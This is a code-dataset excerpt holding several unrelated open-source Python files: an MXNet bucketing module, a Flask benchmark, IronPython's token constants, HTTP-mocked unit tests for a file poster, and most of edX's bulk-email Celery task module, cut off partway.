repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
---|---|---|---|---|
crazy-cat/incubator-mxnet | refs/heads/master | example/speech_recognition/stt_bucketing_module.py | 52 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import mxnet as mx
class STTBucketingModule(mx.mod.BucketingModule):
def save_checkpoint(self, prefix, epoch, save_optimizer_states=False):
symbol, data_names, label_names = self._sym_gen(self._default_bucket_key)
symbol.save('%s-symbol.json' % prefix)
param_name = '%s-%04d.params' % (prefix, epoch)
self.save_params(param_name)
if save_optimizer_states:
state_name = '%s-%04d.states' % (prefix, epoch)
self._curr_module.save_optimizer_states(state_name)
|
whiteclover/solo | refs/heads/master | benchmark/flaskb.py | 1 |
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello World!"
if __name__ == '__main__':
from gevent.wsgi import WSGIServer
http_server = WSGIServer(('', 8080), app, log=None)
http_server.serve_forever() |
jstammers/EDMSuite | refs/heads/atom-mega-mix | NavPython/IronPython/Lib/token.py | 178 | #! /usr/bin/env python
"""Token constants (from "token.h")."""
# This file is automatically generated; please don't muck it up!
#
# To update the symbols in this file, 'cd' to the top directory of
# the python source tree after building the interpreter and run:
#
# python Lib/token.py
#--start constants--
ENDMARKER = 0
NAME = 1
NUMBER = 2
STRING = 3
NEWLINE = 4
INDENT = 5
DEDENT = 6
LPAR = 7
RPAR = 8
LSQB = 9
RSQB = 10
COLON = 11
COMMA = 12
SEMI = 13
PLUS = 14
MINUS = 15
STAR = 16
SLASH = 17
VBAR = 18
AMPER = 19
LESS = 20
GREATER = 21
EQUAL = 22
DOT = 23
PERCENT = 24
BACKQUOTE = 25
LBRACE = 26
RBRACE = 27
EQEQUAL = 28
NOTEQUAL = 29
LESSEQUAL = 30
GREATEREQUAL = 31
TILDE = 32
CIRCUMFLEX = 33
LEFTSHIFT = 34
RIGHTSHIFT = 35
DOUBLESTAR = 36
PLUSEQUAL = 37
MINEQUAL = 38
STAREQUAL = 39
SLASHEQUAL = 40
PERCENTEQUAL = 41
AMPEREQUAL = 42
VBAREQUAL = 43
CIRCUMFLEXEQUAL = 44
LEFTSHIFTEQUAL = 45
RIGHTSHIFTEQUAL = 46
DOUBLESTAREQUAL = 47
DOUBLESLASH = 48
DOUBLESLASHEQUAL = 49
AT = 50
OP = 51
ERRORTOKEN = 52
N_TOKENS = 53
NT_OFFSET = 256
#--end constants--
tok_name = {}
for _name, _value in globals().items():
if type(_value) is type(0):
tok_name[_value] = _name
del _name, _value
def ISTERMINAL(x):
return x < NT_OFFSET
def ISNONTERMINAL(x):
return x >= NT_OFFSET
def ISEOF(x):
return x == ENDMARKER
def main():
import re
import sys
args = sys.argv[1:]
inFileName = args and args[0] or "Include/token.h"
outFileName = "Lib/token.py"
if len(args) > 1:
outFileName = args[1]
try:
fp = open(inFileName)
except IOError, err:
sys.stdout.write("I/O error: %s\n" % str(err))
sys.exit(1)
lines = fp.read().split("\n")
fp.close()
prog = re.compile(
"#define[ \t][ \t]*([A-Z0-9][A-Z0-9_]*)[ \t][ \t]*([0-9][0-9]*)",
re.IGNORECASE)
tokens = {}
for line in lines:
match = prog.match(line)
if match:
name, val = match.group(1, 2)
val = int(val)
tokens[val] = name # reverse so we can sort them...
keys = tokens.keys()
keys.sort()
# load the output skeleton from the target:
try:
fp = open(outFileName)
except IOError, err:
sys.stderr.write("I/O error: %s\n" % str(err))
sys.exit(2)
format = fp.read().split("\n")
fp.close()
try:
start = format.index("#--start constants--") + 1
end = format.index("#--end constants--")
except ValueError:
sys.stderr.write("target does not contain format markers")
sys.exit(3)
lines = []
for val in keys:
lines.append("%s = %d" % (tokens[val], val))
format[start:end] = lines
try:
fp = open(outFileName, 'w')
except IOError, err:
sys.stderr.write("I/O error: %s\n" % str(err))
sys.exit(4)
fp.write("\n".join(format))
fp.close()
if __name__ == "__main__":
main()
|
pdc/dozup | refs/heads/master | tests/test_poster.py | 1 | # -*- coding: UTF-8 -*-
from __future__ import unicode_literals
import io
import json
import shutil
import tempfile
import unittest
import httpretty
from dozup import DozupPoster, DozupError
class PosterTestMixin(unittest.TestCase):
status_code = 202
endpoint_uri = 'http://example.com/drop/'
content_type = 'application/json'
content = json.dumps({'status': 'OK'})
def setUp(self):
super(PosterTestMixin, self).setUp()
self.dir_path = tempfile.mkdtemp('.test', 'DozupQueueTests.')
self.poster = DozupPoster('http://example.com/drop/')
def tearDown(self):
shutil.rmtree(self.dir_path)
super(PosterTestMixin, self).tearDown()
def given_server_endpoint(self, content=None, content_type=None):
httpretty.register_uri(
httpretty.POST, self.endpoint_uri,
status=self.status_code,
content_type=(content_type or self.content_type),
body=(content or self.content))
def when_posting(self, file_name='name_of_file.txt', file_content=b'content of file'):
strm = io.BytesIO(file_content)
self.result = self.poster.post(file_name, strm)
def then_error_should_be(self, expected):
self.assertFalse(self.result)
self.assertEqual(DozupError(self.status_code, expected), self.poster.errors[-1])
class PosterCreatedTests(PosterTestMixin, unittest.TestCase):
status_code = 201
@httpretty.activate
def test_post_one_file(self):
self.given_server_endpoint()
self.when_posting(file_content=b'this is the message content')
self.assertTrue(self.result)
self.assertEqual(b'this is the message content', httpretty.last_request().body)
self.assertEqual(b'POST', httpretty.last_request().method)
self.assertEqual(b'/drop/', httpretty.last_request().path)
class PosterOKTests(PosterCreatedTests):
status_code = 201
class PosterAcceptedTests(PosterCreatedTests):
status_code = 202
class PosterUnreadyTests(PosterTestMixin, unittest.TestCase):
status_code = 503
status_reason = 'Service Unavailable'
content_type = 'application/json'
@httpretty.activate
def test_retains_plain_text_error_message(self):
self.given_server_endpoint('Sorry!', 'text/plain')
self.when_posting()
self.then_error_should_be('Sorry!')
@httpretty.activate
def test_retains_json_error_string(self):
self.given_server_endpoint('{"error": "Not today, thank you!"}')
self.when_posting()
self.then_error_should_be('Not today, thank you!')
@httpretty.activate
def test_retains_json_error_object(self):
self.given_server_endpoint('{"errors": [{"message": "Not today, thank you!"}]}')
self.when_posting()
self.then_error_should_be({"message": "Not today, thank you!"})
@httpretty.activate
def test_synthesizes_error_message_from_status_code_if_it_must(self):
self.given_server_endpoint('{"flange": "heliotrope"}')
self.when_posting()
self.then_error_should_be(self.status_reason)
class PosterNotFoundTests(PosterUnreadyTests):
status_code = 404
status_reason = 'Not Found'
class PosterForbiddenTests(PosterUnreadyTests):
status_code = 403
status_reason = 'Forbidden'
class PosterInternalServerErrorTests(PosterUnreadyTests):
status_code = 500
status_reason = 'Internal Server Error'
class HalPosterUnreadyTests(PosterUnreadyTests):
content_type = 'application/hal+json'
|
chand3040/cloud_that | refs/heads/named-release/cypress.rc | lms/djangoapps/bulk_email/tasks.py | 29 | # -*- coding: utf-8 -*-
"""
This module contains celery task functions for handling the sending of bulk email
to a course.
"""
import re
import random
import json
from time import sleep
from collections import Counter
import logging
import dogstats_wrapper as dog_stats_api
from smtplib import SMTPServerDisconnected, SMTPDataError, SMTPConnectError, SMTPException
from boto.ses.exceptions import (
SESAddressNotVerifiedError,
SESIdentityNotVerifiedError,
SESDomainNotConfirmedError,
SESAddressBlacklistedError,
SESDailyQuotaExceededError,
SESMaxSendingRateExceededError,
SESDomainEndsWithDotError,
SESLocalAddressCharacterError,
SESIllegalAddressError,
)
from boto.exception import AWSConnectionError
from celery import task, current_task
from celery.states import SUCCESS, FAILURE, RETRY
from celery.exceptions import RetryTaskError
from django.conf import settings
from django.contrib.auth.models import User
from django.core.mail import EmailMultiAlternatives, get_connection
from django.core.urlresolvers import reverse
from bulk_email.models import (
CourseEmail, Optout,
SEND_TO_MYSELF, SEND_TO_ALL, TO_OPTIONS,
SEND_TO_STAFF,
)
from courseware.courses import get_course, course_image_url
from student.roles import CourseStaffRole, CourseInstructorRole
from instructor_task.models import InstructorTask
from instructor_task.subtasks import (
SubtaskStatus,
queue_subtasks_for_query,
check_subtask_is_valid,
update_subtask_status,
)
from util.query import use_read_replica_if_available
from util.date_utils import get_default_time_display
log = logging.getLogger('edx.celery.task')
# Errors that an individual email is failing to be sent, and should just
# be treated as a fail.
SINGLE_EMAIL_FAILURE_ERRORS = (
SESAddressBlacklistedError, # Recipient's email address has been temporarily blacklisted.
SESDomainEndsWithDotError, # Recipient's email address' domain ends with a period/dot.
SESIllegalAddressError, # Raised when an illegal address is encountered.
SESLocalAddressCharacterError, # An address contained a control or whitespace character.
)
# Exceptions that, if caught, should cause the task to be re-tried.
# These errors will be caught a limited number of times before the task fails.
LIMITED_RETRY_ERRORS = (
SMTPConnectError,
SMTPServerDisconnected,
AWSConnectionError,
)
# Errors that indicate that a mailing task should be retried without limit.
# An example is if email is being sent too quickly, but may succeed if sent
# more slowly. When caught by a task, it triggers an exponential backoff and retry.
# Retries happen continuously until the email is sent.
# Note that the SMTPDataErrors here are only those within the 4xx range.
# Those not in this range (i.e. in the 5xx range) are treated as hard failures
# and thus like SINGLE_EMAIL_FAILURE_ERRORS.
INFINITE_RETRY_ERRORS = (
SESMaxSendingRateExceededError, # Your account's requests/second limit has been exceeded.
SMTPDataError,
)
# Errors that are known to indicate an inability to send any more emails,
# and should therefore not be retried. For example, exceeding a quota for emails.
# Also, any SMTP errors that are not explicitly enumerated above.
BULK_EMAIL_FAILURE_ERRORS = (
SESAddressNotVerifiedError, # Raised when a "Reply-To" address has not been validated in SES yet.
SESIdentityNotVerifiedError, # Raised when an identity has not been verified in SES yet.
SESDomainNotConfirmedError, # Raised when domain ownership is not confirmed for DKIM.
SESDailyQuotaExceededError, # 24-hour allotment of outbound email has been exceeded.
SMTPException,
)
def _get_recipient_querysets(user_id, to_option, course_id):
"""
Returns a list of query sets of email recipients corresponding to the
requested `to_option` category.
`to_option` is either SEND_TO_MYSELF, SEND_TO_STAFF, or SEND_TO_ALL.
Recipients who are in more than one category (e.g. enrolled in the course
and are staff or self) will be properly deduped.
"""
if to_option not in TO_OPTIONS:
log.error("Unexpected bulk email TO_OPTION found: %s", to_option)
raise Exception("Unexpected bulk email TO_OPTION found: {0}".format(to_option))
if to_option == SEND_TO_MYSELF:
user = User.objects.filter(id=user_id)
return [use_read_replica_if_available(user)]
else:
staff_qset = CourseStaffRole(course_id).users_with_role()
instructor_qset = CourseInstructorRole(course_id).users_with_role()
staff_instructor_qset = (staff_qset | instructor_qset).distinct()
if to_option == SEND_TO_STAFF:
return [use_read_replica_if_available(staff_instructor_qset)]
if to_option == SEND_TO_ALL:
# We also require students to have activated their accounts to
# provide verification that the provided email address is valid.
enrollment_qset = User.objects.filter(
is_active=True,
courseenrollment__course_id=course_id,
courseenrollment__is_active=True
)
# to avoid duplicates, we only want to email unenrolled course staff
# members here
unenrolled_staff_qset = staff_instructor_qset.exclude(
courseenrollment__course_id=course_id, courseenrollment__is_active=True
)
# use read_replica if available
recipient_qsets = [
use_read_replica_if_available(unenrolled_staff_qset),
use_read_replica_if_available(enrollment_qset),
]
return recipient_qsets
def _get_course_email_context(course):
"""
Returns context arguments to apply to all emails, independent of recipient.
"""
course_id = course.id.to_deprecated_string()
course_title = course.display_name
course_end_date = get_default_time_display(course.end)
course_url = 'https://{}{}'.format(
settings.SITE_NAME,
reverse('course_root', kwargs={'course_id': course_id})
)
image_url = u'https://{}{}'.format(settings.SITE_NAME, course_image_url(course))
email_context = {
'course_title': course_title,
'course_url': course_url,
'course_image_url': image_url,
'course_end_date': course_end_date,
'account_settings_url': 'https://{}{}'.format(settings.SITE_NAME, reverse('account_settings')),
'platform_name': settings.PLATFORM_NAME,
}
return email_context
def perform_delegate_email_batches(entry_id, course_id, task_input, action_name):
"""
Delegates emails by querying for the list of recipients who should
get the mail, chopping up into batches of no more than settings.BULK_EMAIL_EMAILS_PER_TASK
in size, and queueing up worker jobs.
"""
entry = InstructorTask.objects.get(pk=entry_id)
# Get inputs to use in this task from the entry.
user_id = entry.requester.id
task_id = entry.task_id
# Perfunctory check, since expansion is made for convenience of other task
# code that doesn't need the entry_id.
if course_id != entry.course_id:
format_msg = u"Course id conflict: explicit value %r does not match task value %r"
log.warning(u"Task %s: " + format_msg, task_id, course_id, entry.course_id)
raise ValueError(format_msg % (course_id, entry.course_id))
# Fetch the CourseEmail.
email_id = task_input['email_id']
try:
email_obj = CourseEmail.objects.get(id=email_id)
except CourseEmail.DoesNotExist:
# The CourseEmail object should be committed in the view function before the task
# is submitted and reaches this point.
log.warning(u"Task %s: Failed to get CourseEmail with id %s", task_id, email_id)
raise
# Check to see if email batches have already been defined. This seems to
# happen sometimes when there is a loss of connection while a task is being
# queued. When this happens, the same task gets called again, and a whole
# new raft of subtasks gets queued up. We will assume that if subtasks
# have already been defined, there is no need to redefine them below.
# So we just return right away. We don't raise an exception, because we want
# the current task to be marked with whatever it had been marked with before.
if len(entry.subtasks) > 0 and len(entry.task_output) > 0:
log.warning(u"Task %s has already been processed for email %s! InstructorTask = %s", task_id, email_id, entry)
progress = json.loads(entry.task_output)
return progress
# Sanity check that course for email_obj matches that of the task referencing it.
if course_id != email_obj.course_id:
format_msg = u"Course id conflict: explicit value %r does not match email value %r"
log.warning(u"Task %s: " + format_msg, task_id, course_id, email_obj.course_id)
raise ValueError(format_msg % (course_id, email_obj.course_id))
# Fetch the course object.
course = get_course(course_id)
if course is None:
msg = u"Task %s: course not found: %s"
log.error(msg, task_id, course_id)
raise ValueError(msg % (task_id, course_id))
# Get arguments that will be passed to every subtask.
to_option = email_obj.to_option
global_email_context = _get_course_email_context(course)
recipient_qsets = _get_recipient_querysets(user_id, to_option, course_id)
recipient_fields = ['profile__name', 'email']
log.info(u"Task %s: Preparing to queue subtasks for sending emails for course %s, email %s, to_option %s",
task_id, course_id, email_id, to_option)
total_recipients = sum([recipient_queryset.count() for recipient_queryset in recipient_qsets])
routing_key = settings.BULK_EMAIL_ROUTING_KEY
# if there are few enough emails, send them through a different queue
# to avoid large courses blocking emails to self and staff
if total_recipients <= settings.BULK_EMAIL_JOB_SIZE_THRESHOLD:
routing_key = settings.BULK_EMAIL_ROUTING_KEY_SMALL_JOBS
def _create_send_email_subtask(to_list, initial_subtask_status):
"""Creates a subtask to send email to a given recipient list."""
subtask_id = initial_subtask_status.task_id
new_subtask = send_course_email.subtask(
(
entry_id,
email_id,
to_list,
global_email_context,
initial_subtask_status.to_dict(),
),
task_id=subtask_id,
routing_key=routing_key,
)
return new_subtask
progress = queue_subtasks_for_query(
entry,
action_name,
_create_send_email_subtask,
recipient_qsets,
recipient_fields,
settings.BULK_EMAIL_EMAILS_PER_TASK,
total_recipients,
)
# We want to return progress here, as this is what will be stored in the
# AsyncResult for the parent task as its return value.
# The AsyncResult will then be marked as SUCCEEDED, and have this return value as its "result".
# That's okay, for the InstructorTask will have the "real" status, and monitoring code
# should be using that instead.
return progress
@task(default_retry_delay=settings.BULK_EMAIL_DEFAULT_RETRY_DELAY, max_retries=settings.BULK_EMAIL_MAX_RETRIES) # pylint: disable=not-callable
def send_course_email(entry_id, email_id, to_list, global_email_context, subtask_status_dict):
"""
Sends an email to a list of recipients.
Inputs are:
* `entry_id`: id of the InstructorTask object to which progress should be recorded.
* `email_id`: id of the CourseEmail model that is to be emailed.
* `to_list`: list of recipients. Each is represented as a dict with the following keys:
- 'profile__name': full name of User.
- 'email': email address of User.
- 'pk': primary key of User model.
* `global_email_context`: dict containing values that are unique for this email but the same
for all recipients of this email. This dict is to be used to fill in slots in email
template. It does not include 'name' and 'email', which will be provided by the to_list.
* `subtask_status_dict` : dict containing values representing current status. Keys are:
'task_id' : id of subtask. This is used to pass task information across retries.
'attempted' : number of attempts -- should equal succeeded plus failed
'succeeded' : number that succeeded in processing
'skipped' : number that were not processed.
'failed' : number that failed during processing
'retried_nomax' : number of times the subtask has been retried for conditions that
should not have a maximum count applied
'retried_withmax' : number of times the subtask has been retried for conditions that
should have a maximum count applied
'state' : celery state of the subtask (e.g. QUEUING, PROGRESS, RETRY, FAILURE, SUCCESS)
Most values will be zero on initial call, but may be different when the task is
invoked as part of a retry.
Sends to all addresses contained in to_list that are not also in the Optout table.
Emails are sent multi-part, in both plain text and html. Updates InstructorTask object
with status information (sends, failures, skips) and updates number of subtasks completed.
"""
subtask_status = SubtaskStatus.from_dict(subtask_status_dict)
current_task_id = subtask_status.task_id
num_to_send = len(to_list)
log.info(u"Preparing to send email %s to %d recipients as subtask %s for instructor task %d: context = %s, status=%s",
email_id, num_to_send, current_task_id, entry_id, global_email_context, subtask_status)
# Check that the requested subtask is actually known to the current InstructorTask entry.
# If this fails, it throws an exception, which should fail this subtask immediately.
# This can happen when the parent task has been run twice, and results in duplicate
# subtasks being created for the same InstructorTask entry. This can happen when Celery
# loses its connection to its broker, and any current tasks get requeued.
# We hope to catch this condition in perform_delegate_email_batches() when it's the parent
# task that is resubmitted, but just in case we fail to do so there, we check here as well.
# There is also a possibility that this task will be run twice by Celery, for the same reason.
# To deal with that, we need to confirm that the task has not already been completed.
check_subtask_is_valid(entry_id, current_task_id, subtask_status)
send_exception = None
new_subtask_status = None
try:
course_title = global_email_context['course_title']
with dog_stats_api.timer('course_email.single_task.time.overall', tags=[_statsd_tag(course_title)]):
new_subtask_status, send_exception = _send_course_email(
entry_id,
email_id,
to_list,
global_email_context,
subtask_status,
)
except Exception:
# Unexpected exception. Try to write out the failure to the entry before failing.
log.exception("Send-email task %s for email %s: failed unexpectedly!", current_task_id, email_id)
# We got here for really unexpected reasons. Since we don't know how far
# the task got in emailing, we count all recipients as having failed.
# It at least keeps the counts consistent.
subtask_status.increment(failed=num_to_send, state=FAILURE)
update_subtask_status(entry_id, current_task_id, subtask_status)
raise
if send_exception is None:
# Update the InstructorTask object that is storing its progress.
log.info("Send-email task %s for email %s: succeeded", current_task_id, email_id)
update_subtask_status(entry_id, current_task_id, new_subtask_status)
elif isinstance(send_exception, RetryTaskError):
# If retrying, a RetryTaskError needs to be returned to Celery.
# We assume that the the progress made before the retry condition
# was encountered has already been updated before the retry call was made,
# so we only log here.
log.warning("Send-email task %s for email %s: being retried", current_task_id, email_id)
raise send_exception # pylint: disable=raising-bad-type
else:
log.error("Send-email task %s for email %s: failed: %s", current_task_id, email_id, send_exception)
update_subtask_status(entry_id, current_task_id, new_subtask_status)
raise send_exception # pylint: disable=raising-bad-type
# return status in a form that can be serialized by Celery into JSON:
log.info("Send-email task %s for email %s: returning status %s", current_task_id, email_id, new_subtask_status)
return new_subtask_status.to_dict()
def _filter_optouts_from_recipients(to_list, course_id):
"""
Filters a recipient list based on student opt-outs for a given course.
Returns the filtered recipient list, as well as the number of optouts
removed from the list.
"""
optouts = Optout.objects.filter(
course_id=course_id,
user__in=[i['pk'] for i in to_list]
).values_list('user__email', flat=True)
optouts = set(optouts)
# Only count the num_optout for the first time the optouts are calculated.
# We assume that the number will not change on retries, and so we don't need
# to calculate it each time.
num_optout = len(optouts)
to_list = [recipient for recipient in to_list if recipient['email'] not in optouts]
return to_list, num_optout
def _get_source_address(course_id, course_title):
"""
Calculates an email address to be used as the 'from-address' for sent emails.
Makes a unique from name and address for each course, e.g.
"COURSE_TITLE" Course Staff <[email protected]>
"""
course_title_no_quotes = re.sub(r'"', '', course_title)
# For the email address, get the course. Then make sure that it can be used
# in an email address, by substituting a '_' anywhere a non-(ascii, period, or dash)
# character appears.
from_addr = u'"{0}" Course Staff <{1}-{2}>'.format(
course_title_no_quotes,
re.sub(r"[^\w.-]", '_', course_id.course),
settings.BULK_EMAIL_DEFAULT_FROM_EMAIL
)
return from_addr
def _send_course_email(entry_id, email_id, to_list, global_email_context, subtask_status):
"""
Performs the email sending task.
Sends an email to a list of recipients.
Inputs are:
* `entry_id`: id of the InstructorTask object to which progress should be recorded.
* `email_id`: id of the CourseEmail model that is to be emailed.
* `to_list`: list of recipients. Each is represented as a dict with the following keys:
- 'profile__name': full name of User.
- 'email': email address of User.
- 'pk': primary key of User model.
* `global_email_context`: dict containing values that are unique for this email but the same
for all recipients of this email. This dict is to be used to fill in slots in email
template. It does not include 'name' and 'email', which will be provided by the to_list.
* `subtask_status` : object of class SubtaskStatus representing current status.
Sends to all addresses contained in to_list that are not also in the Optout table.
Emails are sent multi-part, in both plain text and html.
Returns a tuple of two values:
* First value is a SubtaskStatus object which represents current progress at the end of this call.
* Second value is an exception returned by the innards of the method, indicating a fatal error.
In this case, the number of recipients that were not sent have already been added to the
'failed' count above.
"""
# Get information from current task's request:
parent_task_id = InstructorTask.objects.get(pk=entry_id).task_id
task_id = subtask_status.task_id
total_recipients = len(to_list)
recipient_num = 0
total_recipients_successful = 0
total_recipients_failed = 0
recipients_info = Counter()
log.info(
"BulkEmail ==> Task: %s, SubTask: %s, EmailId: %s, TotalRecipients: %s",
parent_task_id,
task_id,
email_id,
total_recipients
)
try:
course_email = CourseEmail.objects.get(id=email_id)
except CourseEmail.DoesNotExist as exc:
log.exception(
"BulkEmail ==> Task: %s, SubTask: %s, EmailId: %s, Could not find email to send.",
parent_task_id,
task_id,
email_id
)
raise
# Exclude optouts (if not a retry):
# Note that we don't have to do the optout logic at all if this is a retry,
# because we have presumably already performed the optout logic on the first
# attempt. Anyone on the to_list on a retry has already passed the filter
# that existed at that time, and we don't need to keep checking for changes
# in the Optout list.
if subtask_status.get_retry_count() == 0:
to_list, num_optout = _filter_optouts_from_recipients(to_list, course_email.course_id)
subtask_status.increment(skipped=num_optout)
course_title = global_email_context['course_title']
# use the email from address in the CourseEmail, if it is present, otherwise compute it
from_addr = course_email.from_addr if course_email.from_addr else \
_get_source_address(course_email.course_id, course_title)
# use the CourseEmailTemplate that was associated with the CourseEmail
course_email_template = course_email.get_template()
try:
connection = get_connection()
connection.open()
# Define context values to use in all course emails:
email_context = {'name': '', 'email': ''}
email_context.update(global_email_context)
while to_list:
# Update context with user-specific values from the user at the end of the list.
# At the end of processing this user, they will be popped off of the to_list.
# That way, the to_list will always contain the recipients remaining to be emailed.
# This is convenient for retries, which will need to send to those who haven't
# yet been emailed, but not send to those who have already been sent to.
recipient_num += 1
current_recipient = to_list[-1]
email = current_recipient['email']
email_context['email'] = email
email_context['name'] = current_recipient['profile__name']
email_context['user_id'] = current_recipient['pk']
email_context['course_id'] = course_email.course_id
# Construct message content using templates and context:
plaintext_msg = course_email_template.render_plaintext(course_email.text_message, email_context)
html_msg = course_email_template.render_htmltext(course_email.html_message, email_context)
# Create email:
email_msg = EmailMultiAlternatives(
course_email.subject,
plaintext_msg,
from_addr,
[email],
connection=connection
)
email_msg.attach_alternative(html_msg, 'text/html')
# Throttle if we have gotten the rate limiter. This is not very high-tech,
# but if a task has been retried for rate-limiting reasons, then we sleep
# for a period of time between all emails within this task. Choice of
# the value depends on the number of workers that might be sending email in
# parallel, and what the SES throttle rate is.
if subtask_status.retried_nomax > 0:
sleep(settings.BULK_EMAIL_RETRY_DELAY_BETWEEN_SENDS)
try:
log.info(
"BulkEmail ==> Task: %s, SubTask: %s, EmailId: %s, Recipient num: %s/%s, \
Recipient name: %s, Email address: %s",
parent_task_id,
task_id,
email_id,
recipient_num,
total_recipients,
current_recipient['profile__name'],
email
)
with dog_stats_api.timer('course_email.single_send.time.overall', tags=[_statsd_tag(course_title)]):
connection.send_messages([email_msg])
except SMTPDataError as exc:
# According to SMTP spec, we'll retry error codes in the 4xx range. 5xx range indicates hard failure.
total_recipients_failed += 1
log.error(
"BulkEmail ==> Status: Failed(SMTPDataError), Task: %s, SubTask: %s, EmailId: %s, \
Recipient num: %s/%s, Email address: %s",
parent_task_id,
task_id,
email_id,
recipient_num,
total_recipients,
email
)
if exc.smtp_code >= 400 and exc.smtp_code < 500:
# This will cause the outer handler to catch the exception and retry the entire task.
raise exc
else:
# This will fall through and not retry the message.
log.warning(
'BulkEmail ==> Task: %s, SubTask: %s, EmailId: %s, Recipient num: %s/%s, \
Email not delivered to %s due to error %s',
parent_task_id,
task_id,
email_id,
recipient_num,
total_recipients,
email,
exc.smtp_error
)
dog_stats_api.increment('course_email.error', tags=[_statsd_tag(course_title)])
subtask_status.increment(failed=1)
except SINGLE_EMAIL_FAILURE_ERRORS as exc:
# This will fall through and not retry the message.
total_recipients_failed += 1
log.error(
"BulkEmail ==> Status: Failed(SINGLE_EMAIL_FAILURE_ERRORS), Task: %s, SubTask: %s, \
EmailId: %s, Recipient num: %s/%s, Email address: %s, Exception: %s",
parent_task_id,
task_id,
email_id,
recipient_num,
total_recipients,
email,
exc
)
dog_stats_api.increment('course_email.error', tags=[_statsd_tag(course_title)])
subtask_status.increment(failed=1)
else:
total_recipients_successful += 1
log.info(
"BulkEmail ==> Status: Success, Task: %s, SubTask: %s, EmailId: %s, \
Recipient num: %s/%s, Email address: %s,",
parent_task_id,
task_id,
email_id,
recipient_num,
total_recipients,
email
)
dog_stats_api.increment('course_email.sent', tags=[_statsd_tag(course_title)])
if settings.BULK_EMAIL_LOG_SENT_EMAILS:
log.info('Email with id %s sent to %s', email_id, email)
else:
log.debug('Email with id %s sent to %s', email_id, email)
subtask_status.increment(succeeded=1)
# Pop the user that was emailed off the end of the list only once they have
# successfully been processed. (That way, if there were a failure that
# needed to be retried, the user is still on the list.)
recipients_info[email] += 1
to_list.pop()
log.info(
"BulkEmail ==> Task: %s, SubTask: %s, EmailId: %s, Total Successful Recipients: %s/%s, \
Failed Recipients: %s/%s",
parent_task_id,
task_id,
email_id,
total_recipients_successful,
total_recipients,
total_recipients_failed,
total_recipients
)
duplicate_recipients = ["{0} ({1})".format(email, repetition)
for email, repetition in recipients_info.most_common() if repetition > 1]
if duplicate_recipients:
log.info(
"BulkEmail ==> Task: %s, SubTask: %s, EmailId: %s, Total Duplicate Recipients [%s]: [%s]",
parent_task_id,
task_id,
email_id,
len(duplicate_recipients),
', '.join(duplicate_recipients)
)
except INFINITE_RETRY_ERRORS as exc:
dog_stats_api.increment('course_email.infinite_retry', tags=[_statsd_tag(course_title)])
# Increment the "retried_nomax" counter, update other counters with progress to date,
# and set the state to RETRY:
subtask_status.increment(retried_nomax=1, state=RETRY)
return _submit_for_retry(
entry_id, email_id, to_list, global_email_context, exc, subtask_status, skip_retry_max=True
)
except LIMITED_RETRY_ERRORS as exc:
# Errors caught here cause the email to be retried. The entire task is actually retried
# without popping the current recipient off of the existing list.
# Errors caught are those that indicate a temporary condition that might succeed on retry.
dog_stats_api.increment('course_email.limited_retry', tags=[_statsd_tag(course_title)])
# Increment the "retried_withmax" counter, update other counters with progress to date,
# and set the state to RETRY:
subtask_status.increment(retried_withmax=1, state=RETRY)
return _submit_for_retry(
entry_id, email_id, to_list, global_email_context, exc, subtask_status, skip_retry_max=False
)
except BULK_EMAIL_FAILURE_ERRORS as exc:
dog_stats_api.increment('course_email.error', tags=[_statsd_tag(course_title)])
num_pending = len(to_list)
log.exception('Task %s: email with id %d caused send_course_email task to fail with "fatal" exception. %d emails unsent.',
task_id, email_id, num_pending)
# Update counters with progress to date, counting unsent emails as failures,
# and set the state to FAILURE:
subtask_status.increment(failed=num_pending, state=FAILURE)
return subtask_status, exc
except Exception as exc:
# Errors caught here cause the email to be retried. The entire task is actually retried
# without popping the current recipient off of the existing list.
# These are unexpected errors. Since they might be due to a temporary condition that might
# succeed on retry, we give them a retry.
dog_stats_api.increment('course_email.limited_retry', tags=[_statsd_tag(course_title)])
log.exception('Task %s: email with id %d caused send_course_email task to fail with unexpected exception. Generating retry.',
task_id, email_id)
# Increment the "retried_withmax" counter, update other counters with progress to date,
# and set the state to RETRY:
subtask_status.increment(retried_withmax=1, state=RETRY)
return _submit_for_retry(
entry_id, email_id, to_list, global_email_context, exc, subtask_status, skip_retry_max=False
)
else:
# All went well. Update counters with progress to date,
# and set the state to SUCCESS:
subtask_status.increment(state=SUCCESS)
# Successful completion is marked by an exception value of None.
return subtask_status, None
finally:
# Clean up at the end.
connection.close()
def _get_current_task():
"""
Stub to make it easier to test without actually running Celery.
This is a wrapper around celery.current_task, which provides access
to the top of the stack of Celery's tasks. When running tests, however,
it doesn't seem to work to mock current_task directly, so this wrapper
is used to provide a hook to mock in tests, while providing the real
`current_task` in production.
"""
return current_task
def _submit_for_retry(entry_id, email_id, to_list, global_email_context, current_exception, subtask_status, skip_retry_max=False):
"""
Helper function to requeue a task for retry, using the new version of arguments provided.
Inputs are the same as for running a task, plus two extra indicating the state at the time of retry.
These include the `current_exception` that the task encountered that is causing the retry attempt,
and the `subtask_status` that is to be returned. A third extra argument `skip_retry_max`
indicates whether the current retry should be subject to a maximum test.
Returns a tuple of two values:
* First value is a dict which represents current progress. Keys are:
'task_id' : id of subtask. This is used to pass task information across retries.
'attempted' : number of attempts -- should equal succeeded plus failed
'succeeded' : number that succeeded in processing
'skipped' : number that were not processed.
'failed' : number that failed during processing
'retried_nomax' : number of times the subtask has been retried for conditions that
should not have a maximum count applied
'retried_withmax' : number of times the subtask has been retried for conditions that
should have a maximum count applied
'state' : celery state of the subtask (e.g. QUEUING, PROGRESS, RETRY, FAILURE, SUCCESS)
* Second value is an exception returned by the innards of the method. If the retry was
successfully submitted, this value will be the RetryTaskError that retry() returns.
Otherwise, it (ought to be) the current_exception passed in.
"""
task_id = subtask_status.task_id
log.info("Task %s: Successfully sent to %s users; failed to send to %s users (and skipped %s users)",
task_id, subtask_status.succeeded, subtask_status.failed, subtask_status.skipped)
# Calculate time until we retry this task (in seconds):
